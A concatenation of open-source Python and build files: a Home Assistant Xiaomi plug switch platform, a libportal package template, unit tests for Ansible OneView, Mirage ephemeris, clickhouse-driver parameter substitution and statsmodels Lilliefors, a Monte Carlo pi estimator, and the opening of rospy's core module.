SERVICE_SET_POWER_MODE: {
"method": "async_set_power_mode",
"schema": SERVICE_SCHEMA_POWER_MODE,
},
SERVICE_SET_POWER_PRICE: {
"method": "async_set_power_price",
"schema": SERVICE_SCHEMA_POWER_PRICE,
},
}
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Import Miio configuration from YAML."""
_LOGGER.warning(
"Loading Xiaomi Miio Switch via platform setup is deprecated. Please remove it from your configuration."
)
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=config,
)
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the switch from a config entry."""
entities = []
if config_entry.data[CONF_FLOW_TYPE] == CONF_DEVICE:
if DATA_KEY not in hass.data:
hass.data[DATA_KEY] = {}
host = config_entry.data[CONF_HOST]
token = config_entry.data[CONF_TOKEN]
name = config_entry.title
model = config_entry.data[CONF_MODEL]
unique_id = config_entry.unique_id
_LOGGER.debug("Initializing with host %s (token %s...)", host, token[:5])
if model in ["chuangmi.plug.v1", "chuangmi.plug.v3", "chuangmi.plug.hmi208"]:
plug = ChuangmiPlug(host, token, model=model)
# The device has two switchable channels (mains and a USB port).
# A switch device per channel will be created.
for channel_usb in [True, False]:
if channel_usb:
unique_id_ch = f"{unique_id}-USB"
else:
unique_id_ch = f"{unique_id}-mains"
device = ChuangMiPlugSwitch(
name, plug, config_entry, unique_id_ch, channel_usb
)
entities.append(device)
hass.data[DATA_KEY][host] = device
elif model in ["qmi.powerstrip.v1", "zimi.powerstrip.v2"]:
plug = PowerStrip(host, token, model=model)
device = XiaomiPowerStripSwitch(name, plug, config_entry, unique_id)
entities.append(device)
hass.data[DATA_KEY][host] = device
elif model in [
"chuangmi.plug.m1",
"chuangmi.plug.m3",
"chuangmi.plug.v2",
"chuangmi.plug.hmi205",
"chuangmi.plug.hmi206",
]:
plug = ChuangmiPlug(host, token, model=model)
device = XiaomiPlugGenericSwitch(name, plug, config_entry, unique_id)
entities.append(device)
hass.data[DATA_KEY][host] = device
elif model in ["lumi.acpartner.v3"]:
plug = AirConditioningCompanionV3(host, token)
device = XiaomiAirConditioningCompanionSwitch(
name, plug, config_entry, unique_id
)
entities.append(device)
hass.data[DATA_KEY][host] = device
else:
_LOGGER.error(
"Unsupported device found! Please create an issue at "
"https://github.com/rytilahti/python-miio/issues "
"and provide the following data: %s",
model,
)
async def async_service_handler(service):
"""Map services to methods on XiaomiPlugGenericSwitch."""
method = SERVICE_TO_METHOD.get(service.service)
params = {
key: value
for key, value in service.data.items()
if key != ATTR_ENTITY_ID
}
entity_ids = service.data.get(ATTR_ENTITY_ID)
if entity_ids:
devices = [
device
for device in hass.data[DATA_KEY].values()
if device.entity_id in entity_ids
]
else:
devices = hass.data[DATA_KEY].values()
update_tasks = []
for device in devices:
if not hasattr(device, method["method"]):
continue
await getattr(device, method["method"])(**params)
update_tasks.append(device.async_update_ha_state(True))
if update_tasks:
await asyncio.wait(update_tasks)
for plug_service in SERVICE_TO_METHOD:
schema = SERVICE_TO_METHOD[plug_service].get("schema", SERVICE_SCHEMA)
hass.services.async_register(
DOMAIN, plug_service, async_service_handler, schema=schema
)
async_add_entities(entities, update_before_add=True)
class XiaomiPlugGenericSwitch(XiaomiMiioEntity, SwitchEntity):
"""Representation of a Xiaomi Plug Generic."""
def __init__(self, name, device, entry, unique_id):
"""Initialize the plug switch."""
super().__init__(name, device, entry, unique_id)
self._icon = "mdi:power-socket"
self._available = False
self._state = None
self._state_attrs = {ATTR_TEMPERATURE: None, ATTR_MODEL: self._model}
self._device_features = FEATURE_FLAGS_GENERIC
self._skip_update = False
@property
def icon(self):
"""Return the icon to use for device if any."""
return self._icon
@property
def available(self):
"""Return true when state is known."""
return self._available
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
return self._state_attrs
@property
def is_on(self):
"""Return true if switch is on."""
return self._state
async def _try_command(self, mask_error, func, *args, **kwargs):
"""Call a plug command handling error messages."""
try:
result = await self.hass.async_add_executor_job(
partial(func, *args, **kwargs)
)
_LOGGER.debug("Response received from plug: %s", result)
# The Chuangmi Plug V3 returns 0 on success on usb_on/usb_off.
            if (
                getattr(func, "__name__", None) in ["usb_on", "usb_off"]
                and result == 0
            ):
return True
return result == SUCCESS
except DeviceException as exc:
if self._available:
_LOGGER.error(mask_error, exc)
self._available = False
return False
async def async_turn_on(self, **kwargs):
"""Turn the plug on."""
result = await self._try_command("Turning the plug on failed", self._device.on)
if result:
self._state = True
self._skip_update = True
async def async_turn_off(self, **kwargs):
"""Turn the plug off."""
result = await self._try_command(
"Turning the plug off failed", self._device.off
)
if result:
self._state = False
self._skip_update = True
async def async_update(self):
"""Fetch state from the device."""
# On state change the device doesn't provide the new state immediately.
if self._skip_update:
self._skip_update = False
return
try:
state = await self.hass.async_add_executor_job(self._device.status)
_LOGGER.debug("Got new state: %s", state)
self._available = True
self._state = state.is_on
self._state_attrs[ATTR_TEMPERATURE] = state.temperature
except DeviceException as ex:
if self._available:
self._available = False
_LOGGER.error("Got exception while fetching the state: %s", ex)
async def async_set_wifi_led_on(self):
"""Turn the wifi led on."""
if self._device_features & FEATURE_SET_WIFI_LED == 0:
return
await self._try_command(
"Turning the wifi led on failed", self._device.set_wifi_led, True
)
async def async_set_wifi_led_off(self):
"""Turn the wifi led on."""
if self._device_features & FEATURE_SET_WIFI_LED == 0:
return
await self._try_command(
"Turning the wifi led off failed", self._device.set_wifi_led, False
)
async def async_set_power_price(self, price: int):
"""Set the power price."""
if self._device_features & FEATURE_SET_POWER_PRICE == 0:
return
await self._try_command(
"Setting the power price of the power strip failed",
self._device.set_power_price,
price,
)
class XiaomiPowerStripSwitch(XiaomiPlugGenericSwitch):
"""Representation of a Xiaomi Power Strip."""
    def __init__(self, name, plug, entry, unique_id):
        """Initialize the plug switch."""
        super().__init__(name, plug, entry, unique_id)
if self._model == MODEL_POWER_STRIP_V2:
self._device_features = FEATURE_FLAGS_POWER_STRIP_V2
else:
self._device_features = FEATURE_FLAGS_POWER_STRIP_V1
self._state_attrs[ATTR_LOAD_POWER] = None
        if self._device_features & FEATURE_SET_POWER_MODE:
            self._state_attrs[ATTR_POWER_MODE] = None
        if self._device_features & FEATURE_SET_WIFI_LED:
            self._state_attrs[ATTR_WIFI_LED] = None
        if self._device_features & FEATURE_SET_POWER_PRICE:
            self._state_attrs[ATTR_POWER_PRICE] = None
async def async_update(self):
"""Fetch state from the device."""
# On state change the device doesn't provide the new state immediately.
if self._skip_update:
self._skip_update = False
return
try:
state = await self.hass.async_add_executor_job(self._device.status)
_LOGGER.debug("Got new state: %s", state)
self._available = True
self._state = state.is_on
self._state_attrs.update(
{ATTR_TEMPERATURE: state.temperature, ATTR_LOAD_POWER: state.load_power}
)
            if self._device_features & FEATURE_SET_POWER_MODE and state.mode:
                self._state_attrs[ATTR_POWER_MODE] = state.mode.value
            if self._device_features & FEATURE_SET_WIFI_LED and state.wifi_led:
                self._state_attrs[ATTR_WIFI_LED] = state.wifi_led
            if (
                self._device_features & FEATURE_SET_POWER_PRICE
                and state.power_price
            ):
self._state_attrs[ATTR_POWER_PRICE] = state.power_price
except DeviceException as ex:
if self._available:
self._available = False
_LOGGER.error("Got exception while fetching the state: %s", ex)
async def async_set_power_mode(self, mode: str):
"""Set the power mode."""
if self._device_features & FEATURE_SET_POWER_MODE == 0:
return
await self._try_command(
"Setting the power mode of the power strip failed",
self._device.set_power_mode,
PowerMode(mode),
)
class ChuangMiPlugSwitch(XiaomiPlugGenericSwitch):
"""Representation of a Chuang Mi Plug V1 and V3."""
def __init__(self, name, plug, entry, unique_id, channel_usb):
"""Initialize the plug switch."""
name = f"{name} USB" if channel_usb else name
if unique_id is not None and channel_usb:
unique_id = f"{unique_id}-usb"
super().__init__(name, plug, entry, unique_id)
self._channel_usb = channel_usb
if self._model == MODEL_PLUG_V3:
self._device_features = FEATURE_FLAGS_PLUG_V3
self._state_attrs[ATTR_WIFI_LED] = None
if self._channel_usb is False:
self._state_attrs[ATTR_LOAD_POWER] = None
async def async_turn_on(self, **kwargs):
"""Turn a channel on."""
if self._channel_usb:
result = await self._try_command(
"Turning the plug on failed", self._device.usb_on
)
else:
result = await self._try_command(
"Turning the plug on failed", self._device.on
)
if result:
self._state = True
self._skip_update = True
async def async_turn_off(self, **kwargs):
"""Turn a channel off."""
if self._channel_usb:
result = await self._try_command(
"Turning the plug off failed", self._device.usb_off
)
else:
result = await self._try_command(
"Turning the plug off failed", self._device.off
)
if result:
self._state = False
self._skip_update = True
async def async_update(self):
"""Fetch state from the device."""
# On state change the device doesn't provide the new state immediately.
if self._skip_update:
self._skip_update = False
return
try:
state = await self.hass.async_add_executor_job(self._device.status)
_LOGGER.debug("Got new state: %s", state)
self._available = True
if self._channel_usb:
self._state = state.usb_power
else:
self._state = state.is_on
self._state_attrs[ATTR_TEMPERATURE] = state.temperature
if state.wifi_led:
self._state_attrs[ATTR_WIFI_LED] = state.wifi_led
if self._channel_usb is False and state.load_power:
self._state_attrs[ATTR_LOAD_POWER] = state.load_power
except DeviceException as ex:
if self._available:
self._available = False
_LOGGER.error("Got exception while fetching the state: %s", ex)
class XiaomiAirConditioningCompanionSwitch(XiaomiPlugGenericSwitch):
"""Representation of a Xiaomi AirConditioning Companion."""
    def __init__(self, name, plug, entry, unique_id):
        """Initialize the acpartner switch."""
        super().__init__(name, plug, entry, unique_id)
self._state_attrs.update({ATTR_TEMPERATURE: None, ATTR_LOAD_POWER: None})
async def async_turn_on(self, **kwargs):
"""Turn the socket on."""
result = await self._try_command(
"Turning the socket on failed", self._device.socket_on
)
if result:
self._state = True
self._skip_update = True
async def async_turn_off(self, **kwargs):
"""Turn the socket off."""
result = await self._try_command(
"Turning the socket off failed", self._device.socket_off
)
if result:
self._state = False
self._skip_update = True
async def async_update(self):
"""Fetch state from the device."""
# On state change the device doesn't provide the new state immediately.
if self._skip_update:
self._skip_update = False
return
try:
state = await self.hass.async_add_executor_job(self._device.status)
_LOGGER.debug("Got new state: %s", state)
self._available = True
self._state = state.power_socket == "on"
self._state_attrs[ATTR_LOAD_POWER] = state.load_power
except DeviceException as ex:
if self._available:
self._available = False
_LOGGER.error("Got exception while fetching the state: %s", ex)
|
the-stack_106_12951
|
pkgname = "libportal"
pkgver = "0.6"
pkgrel = 0
build_style = "meson"
configure_args = ["-Ddocs=false", "-Dbackends=gtk3"]
hostmakedepends = [
"meson", "pkgconf", "glib-devel", "gobject-introspection", "vala"
]
makedepends = ["libglib-devel", "gtk+3-devel"]
pkgdesc = "Flatpak portal library"
maintainer = "q66 <[email protected]>"
license = "LGPL-3.0-only"
url = "https://github.com/flatpak/libportal"
source = f"{url}/releases/download/{pkgver}/{pkgname}-{pkgver}.tar.xz"
sha256 = "88a12c3ba71bc31acff7238c280de697d609cebc50830c3766776ec35abc6566"
@subpackage("libportal-gtk3")
def _gtk3(self):
self.pkgdesc = f"{pkgdesc} (Gtk+3 backend)"
return ["usr/lib/girepository-1.0/XdpGtk3*", "usr/lib/libportal-gtk3.so.*"]
@subpackage("libportal-devel")
def _devel(self):
return self.default_devel()
|
the-stack_106_12952
|
# -*- coding: utf-8 -*-
#
# Copyright (2016-2017) Hewlett Packard Enterprise Development LP
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat import unittest
from .oneview_module_loader import FcNetworkModule
from .hpe_test_utils import OneViewBaseTestCase
FAKE_MSG_ERROR = 'Fake message error'
DEFAULT_FC_NETWORK_TEMPLATE = dict(
name='New FC Network 2',
autoLoginRedistribution=True,
fabricType='FabricAttach'
)
PARAMS_FOR_PRESENT = dict(
config='config.json',
state='present',
data=dict(name=DEFAULT_FC_NETWORK_TEMPLATE['name'])
)
PARAMS_WITH_CHANGES = dict(
config='config.json',
state='present',
data=dict(name=DEFAULT_FC_NETWORK_TEMPLATE['name'],
newName="New Name",
fabricType='DirectAttach')
)
PARAMS_FOR_ABSENT = dict(
config='config.json',
state='absent',
data=dict(name=DEFAULT_FC_NETWORK_TEMPLATE['name'])
)
class FcNetworkModuleSpec(unittest.TestCase,
OneViewBaseTestCase):
"""
OneViewBaseTestCase provides the mocks used in this test case
"""
def setUp(self):
self.configure_mocks(self, FcNetworkModule)
self.resource = self.mock_ov_client.fc_networks
def test_should_create_new_fc_network(self):
self.resource.get_by.return_value = []
self.resource.create.return_value = DEFAULT_FC_NETWORK_TEMPLATE
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=FcNetworkModule.MSG_CREATED,
ansible_facts=dict(fc_network=DEFAULT_FC_NETWORK_TEMPLATE)
)
def test_should_not_update_when_data_is_equals(self):
self.resource.get_by.return_value = [DEFAULT_FC_NETWORK_TEMPLATE]
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=FcNetworkModule.MSG_ALREADY_PRESENT,
ansible_facts=dict(fc_network=DEFAULT_FC_NETWORK_TEMPLATE)
)
def test_update_when_data_has_modified_attributes(self):
data_merged = DEFAULT_FC_NETWORK_TEMPLATE.copy()
data_merged['fabricType'] = 'DirectAttach'
self.resource.get_by.return_value = [DEFAULT_FC_NETWORK_TEMPLATE]
self.resource.update.return_value = data_merged
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=FcNetworkModule.MSG_UPDATED,
ansible_facts=dict(fc_network=data_merged)
)
def test_should_remove_fc_network(self):
self.resource.get_by.return_value = [DEFAULT_FC_NETWORK_TEMPLATE]
self.mock_ansible_module.params = PARAMS_FOR_ABSENT
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=FcNetworkModule.MSG_DELETED
)
def test_should_do_nothing_when_fc_network_not_exist(self):
self.resource.get_by.return_value = []
self.mock_ansible_module.params = PARAMS_FOR_ABSENT
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=FcNetworkModule.MSG_ALREADY_ABSENT
)
def test_update_scopes_when_different(self):
params_to_scope = PARAMS_FOR_PRESENT.copy()
params_to_scope['data']['scopeUris'] = ['test']
self.mock_ansible_module.params = params_to_scope
resource_data = DEFAULT_FC_NETWORK_TEMPLATE.copy()
resource_data['scopeUris'] = ['fake']
resource_data['uri'] = 'rest/fc/fake'
self.resource.get_by.return_value = [resource_data]
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
self.resource.patch.return_value = patch_return
FcNetworkModule().run()
self.resource.patch.assert_called_once_with('rest/fc/fake',
operation='replace',
path='/scopeUris',
value=['test'])
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(fc_network=patch_return),
msg=FcNetworkModule.MSG_UPDATED
)
def test_should_do_nothing_when_scopes_are_the_same(self):
params_to_scope = PARAMS_FOR_PRESENT.copy()
params_to_scope['data']['scopeUris'] = ['test']
self.mock_ansible_module.params = params_to_scope
resource_data = DEFAULT_FC_NETWORK_TEMPLATE.copy()
resource_data['scopeUris'] = ['test']
self.resource.get_by.return_value = [resource_data]
FcNetworkModule().run()
self.resource.patch.not_been_called()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(fc_network=resource_data),
msg=FcNetworkModule.MSG_ALREADY_PRESENT
)
if __name__ == '__main__':
unittest.main()
|
the-stack_106_12954
|
"""Unit tests for working with ephemeris files
Authors
-------
- Bryan Hilbert
Use
---
Ensure you have pytest installed. Then, simply run pytest in any
parent directory of mirage/tests/:
>>> pytest
"""
import datetime
import numpy as np
import os
import pkg_resources
from mirage.seed_image import ephemeris_tools
package_path = pkg_resources.resource_filename('mirage', '')
data_dir = os.path.join( os.path.dirname(__file__), 'test_data/ephemeris/')
CONFIG_DIR = os.path.join(package_path, 'config')
def test_create_interpol_function():
"""Create an interpolation function from an ephemeris table
"""
ephemeris_file = os.path.join(data_dir, 'horizons_results.txt')
ephem_table = ephemeris_tools.read_ephemeris_file(ephemeris_file)
ra_function, dec_function = ephemeris_tools.create_interpol_function(ephem_table)
check_time = datetime.datetime(2020, 10, 3)
check_time_calendar = ephemeris_tools.to_timestamp(check_time)
ra_interp = ra_function([check_time_calendar])
dec_interp = dec_function([check_time_calendar])
assert np.isclose(ra_interp[0], 23.74433333333333, atol=1e-9)
assert np.isclose(dec_interp[0], 6.01483333, atol=1e-9)
def test_read_ephemeris_file():
"""Read in an ephemeris and return interpolation funcations. Development
was based on an ephemeris file from Hoirzons.
"""
ephemeris_file = os.path.join(data_dir, 'horizons_results.txt')
ephem = ephemeris_tools.read_ephemeris_file(ephemeris_file)
check_time = datetime.datetime(2020, 10, 1)
match = ephem['Time'] == check_time
assert np.isclose(ephem[match]['RA'].data[0], 24.299791666666664, atol=1e-9)
assert np.isclose(ephem[match]['Dec'].data[0], 6.131916666666666, atol=1e-9)
|
the-stack_106_12955
|
# coding=utf-8
from __future__ import unicode_literals
from datetime import date, datetime
from decimal import Decimal
from uuid import UUID
from enum import IntEnum, Enum
from tests.testcase import BaseTestCase
class ParametersSubstitutionTestCase(BaseTestCase):
single_tpl = 'SELECT %(x)s'
double_tpl = 'SELECT %(x)s, %(y)s'
def assert_subst(self, tpl, params, sql):
self.assertEqual(self.client.substitute_params(tpl, params), sql)
def test_int(self):
params = {'x': 123}
self.assert_subst(self.single_tpl, params, 'SELECT 123')
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [(123, )])
def test_null(self):
params = {'x': None}
self.assert_subst(self.single_tpl, params, 'SELECT NULL')
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [(None, )])
def test_date(self):
d = date(2017, 10, 16)
params = {'x': d}
self.assert_subst(self.single_tpl, params, "SELECT '2017-10-16'")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [('2017-10-16', )])
tpl = 'SELECT CAST(%(x)s AS Date)'
self.assert_subst(tpl, params, "SELECT CAST('2017-10-16' AS Date)")
rv = self.client.execute(tpl, params)
self.assertEqual(rv, [(d, )])
def test_datetime(self):
dt = datetime(2017, 10, 16, 0, 18, 50)
params = {'x': dt}
self.assert_subst(self.single_tpl, params,
"SELECT '2017-10-16 00:18:50'")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [('2017-10-16 00:18:50', )])
tpl = 'SELECT CAST(%(x)s AS DateTime)'
self.assert_subst(tpl, params,
"SELECT CAST('2017-10-16 00:18:50' AS DateTime)")
rv = self.client.execute(tpl, params)
self.assertEqual(rv, [(dt, )])
def test_string(self):
params = {'x': 'test\t\n\x16', 'y': 'тест\t\n\x16'}
self.assert_subst(self.double_tpl, params,
"SELECT 'test\\t\\n\x16', 'тест\\t\\n\x16'")
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [('test\t\n\x16', 'тест\t\n\x16')])
params = {'x': "'"}
self.assert_subst(self.single_tpl, params, "SELECT '\\''")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [("'", )])
params = {'x': "\\"}
self.assert_subst(self.single_tpl, params, "SELECT '\\\\'")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [("\\", )])
def test_array(self):
params = {'x': [1, None, 2]}
self.assert_subst(self.single_tpl, params, 'SELECT [1, NULL, 2]')
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [([1, None, 2], )])
params = {'x': [[1, 2, 3], [4, 5], [6, 7]]}
self.assert_subst(self.single_tpl, params,
'SELECT [[1, 2, 3], [4, 5], [6, 7]]')
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [([[1, 2, 3], [4, 5], [6, 7]], )])
def test_tuple(self):
params = {'x': (1, None, 2)}
self.assert_subst('SELECT * FROM test WHERE a IN %(x)s', params,
'SELECT * FROM test WHERE a IN (1, NULL, 2)')
with self.create_table('a Int32'):
self.client.execute('INSERT INTO test (a) VALUES', [(1, )])
self.client.execute('INSERT INTO test (a) VALUES', [(2, )])
query = 'SELECT * FROM test WHERE a IN (1)'
inserted = self.client.execute(query, columnar=True)
self.assertEqual(inserted, [(1,)])
def test_enum(self):
class A(IntEnum):
hello = -1
world = 2
params = {'x': A.hello, 'y': A.world}
self.assert_subst(self.double_tpl, params, 'SELECT -1, 2')
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [(-1, 2)])
class A(Enum):
hello = 'hello'
world = 'world'
params = {'x': A.hello, 'y': A.world}
self.assert_subst(self.double_tpl, params, "SELECT 'hello', 'world'")
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [('hello', 'world')])
def test_float(self):
params = {'x': 1e-12, 'y': 123.45}
self.assert_subst(self.double_tpl, params, 'SELECT 1e-12, 123.45')
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [(params['x'], params['y'])])
def test_decimal(self):
params = {'x': Decimal('1e-2'), 'y': Decimal('123.45')}
self.assert_subst(self.double_tpl, params, 'SELECT 0.01, 123.45')
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [(0.01, 123.45)])
def test_uuid(self):
params = {'x': UUID('c0fcbba9-0752-44ed-a5d6-4dfb4342b89d')}
self.assert_subst(self.single_tpl, params,
"SELECT 'c0fcbba9-0752-44ed-a5d6-4dfb4342b89d'")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [('c0fcbba9-0752-44ed-a5d6-4dfb4342b89d', )])
def test_substitute_object(self):
params = object()
with self.assertRaises(ValueError) as e:
self.client.substitute_params(self.single_tpl, params)
self.assertEqual(e.exception.args[0],
'Parameters are expected in dict form')
|
the-stack_106_12959
|
import numpy as np
from numpy.testing import assert_almost_equal
from scipy import stats
from statsmodels.stats._lilliefors import lilliefors
class TestLilliefors(object):
def test_normal(self):
np.random.seed(3975)
x_n = stats.norm.rvs(size=500)
# R function call:
# require(nortest)
# lillie.test(x_n)
d_ks_norm, p_norm = lilliefors(x_n, dist='norm')
# shift normal distribution > 0 to exactly mirror R `KScorrect` test
# R `KScorrect` requires all values tested for exponential
# distribution to be > 0
# R function call:
# require(KScorrect)
# LcKS(x_n+abs(min(x_n))+0.001, 'pexp')
d_ks_exp, p_exp = lilliefors(x_n+np.abs(x_n.min()) + 0.001, dist='exp')
# assert normal
assert_almost_equal(d_ks_norm, 0.025957, decimal=3)
assert_almost_equal(p_norm, 0.2000, decimal=3)
# assert exp
assert_almost_equal(d_ks_exp, 0.3436007, decimal=3)
assert_almost_equal(p_exp, 0.01, decimal=3)
def test_expon(self):
np.random.seed(3975)
x_e = stats.expon.rvs(size=500)
# R function call:
# require(nortest)
# lillie.test(x_n)
d_ks_norm, p_norm = lilliefors(x_e, dist='norm')
# R function call:
# require(KScorrect)
# LcKS(x_e, 'pexp')
d_ks_exp, p_exp = lilliefors(x_e, dist='exp')
# assert normal
assert_almost_equal(d_ks_norm, 0.15581, decimal=3)
assert_almost_equal(p_norm, 2.2e-16, decimal=3)
# assert exp
assert_almost_equal(d_ks_exp, 0.02763748, decimal=3)
assert_almost_equal(p_exp, 0.200, decimal=3)
def test_pval_bounds(self):
x = np.arange(1, 10)
d_ks_n, p_n = lilliefors(x, dist='norm')
d_ks_e, p_e = lilliefors(x, dist='exp')
assert_almost_equal(p_n, 0.200, decimal=7)
assert_almost_equal(p_e, 0.200, decimal=7)
|
the-stack_106_12961
|
# -*- coding: utf-8 -*-
# Imports all the necessary libraries
"""This application approximates the PI value based on a Monte Carlo Simulation.
It asks the user for the number of darts to throw."""
import math
import random
import numpy as np
import matplotlib.pyplot as plt
def gen_circle(radius=1, center_x=0, center_y=0, res=50):
"""Returns the points of coordinates [x,y] which lie on the circle
with the radius radius and with the center specified at center = [x,y],
with the resolution res"""
xcord = [center_x + radius * math.cos(tht) for \
tht in np.linspace(0, 2 * math.pi, res)]
ycord = [center_y + radius * math.sin(tht) for \
tht in np.linspace(0, 2 * math.pi, res)]
return [xcord, ycord]
def gen_square(center_x=0, center_y=0, edge=2):
"""Returns the vertices of a square in [x,y] coordinates, which is centered
at the center=[x,y] and with the edge length equal to edge"""
vertices_x = [center_x + edge/2, center_x - \
edge/2, center_x - edge/2, center_x + edge/2]
vertices_y = [center_y + edge/2, center_y + \
edge/2, center_y - edge/2, center_y - edge/2]
vertices = [vertices_x, vertices_y]
return vertices
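# Illustrative check (editor's addition, not in the original script): with the
# defaults, gen_square() returns [[1.0, -1.0, -1.0, 1.0], [1.0, 1.0, -1.0, -1.0]],
# i.e. the corners of the 2x2 square that exactly encloses the radius-1 circle
# produced by gen_circle().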
PLAY = True
APPROX_PI_LIST = list()
NUM_DARTS_LIST = list()
while PLAY:
#Insert the number of darts to be thrown
NUM_DARTS = int( \
input('Please insert the number of darts that you want to throw\n'))
NUM_DARTS_LIST.append(NUM_DARTS)
CIRC_DARTS = {'x':list(), 'y':list()}
SQUARE_DARTS = {'x':list(), 'y':list()}
CIRC_HITS = 0
SQUARE_HITS = 0
for dart in range(NUM_DARTS):
x_dart = random.random() * 2 - 1
y_dart = random.random() * 2 - 1
if(x_dart**2 + y_dart**2)**(1/2) > 1:
SQUARE_HITS += 1
SQUARE_DARTS['x'].append(x_dart)
SQUARE_DARTS['y'].append(y_dart)
elif(x_dart**2 + y_dart**2)**(1/2) <= 1:
CIRC_HITS += 1
CIRC_DARTS['x'].append(x_dart)
CIRC_DARTS['y'].append(y_dart)
else:
pass
APPROX_PI = 4 * CIRC_HITS/NUM_DARTS #THE APPROXIMATED VALUE OF PI
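    # Editor's note: darts land uniformly in the 2x2 square, so the fraction that
    # falls inside the unit circle estimates (pi * 1**2) / (2 * 2) = pi / 4,
    # hence the factor of 4 in the estimate above.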
APPROX_PI_LIST.append(APPROX_PI)
#Plots the darts thrown in a new figure
plt.figure(figsize=(10, 10))
#Plots the square
plt.fill(gen_square()[0], gen_square()[1], fill=False)
#Plots the circle
plt.plot(gen_circle()[0], gen_circle()[1], 'g-')
#Plots the darts which landed on the darts board
plt.plot(CIRC_DARTS['x'], CIRC_DARTS['y'], 'go')
#Plots the darts which landed outside the darts board and inside the square
plt.plot(SQUARE_DARTS['x'], SQUARE_DARTS['y'], 'ro')
#Sets a title to the plot
plt.title('Approximated Pi value: {:6.4f} ==> Darts thrown: {:d}'.format( \
APPROX_PI, NUM_DARTS), {'fontsize':20})
    #Turning off the tick labels for the plots
plt.xticks([])
plt.yticks([])
print("\nYour darts Monte Carlo method approximative value of PI is:",
" {}\n\nThat's {} off from the actual value of PI\n".format(\
APPROX_PI, abs(math.pi - APPROX_PI)))
print('\nCircle hit {} times and square hit {} times'.format(\
CIRC_HITS, SQUARE_HITS))
    QUESTION_STRING = 'Do you want to throw darts again Y/N? \
To see all the plots press N\n'
CONTINUE_PLAY = input(QUESTION_STRING)
if CONTINUE_PLAY == 'Y':
PLAY = True
elif CONTINUE_PLAY == 'N':
PLAY = False
print('\nThank you for playing the game,',
' have a look at all the plots generated\n')
print('\nThe previous results are:\n')
for piVal, dart in zip(APPROX_PI_LIST, NUM_DARTS_LIST):
print(f'Approximated Pi value: {piVal:4} ',
f'==> Darts thrown: {dart:4}')
|
the-stack_106_12964
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Revision $Id$
"""rospy internal core implementation library"""
import atexit
import logging
import os
import signal
import sys
import threading
import time
import traceback
import types
try:
import urllib.parse as urlparse #Python 3.x
except ImportError:
import urlparse
try:
import xmlrpc.client as xmlrpcclient #Python 3.x
except ImportError:
import xmlrpclib as xmlrpcclient #Python 2.x
import rospkg
import rosgraph.roslogging
import rospy.exceptions
import rospy.rostime
from rospy.names import *
from rospy.impl.validators import ParameterInvalid
from rosgraph_msgs.msg import Log
_logger = logging.getLogger("rospy.core")
# number of seconds to wait to join on threads. A network issue can
# cause joins to not terminate gracefully, and it's better to
# tear down dirty than to hang
_TIMEOUT_SHUTDOWN_JOIN = 5.
import warnings
def deprecated(func):
"""This is a decorator which can be used to mark functions
    as deprecated. It will result in a warning being emitted
when the function is used."""
def newFunc(*args, **kwargs):
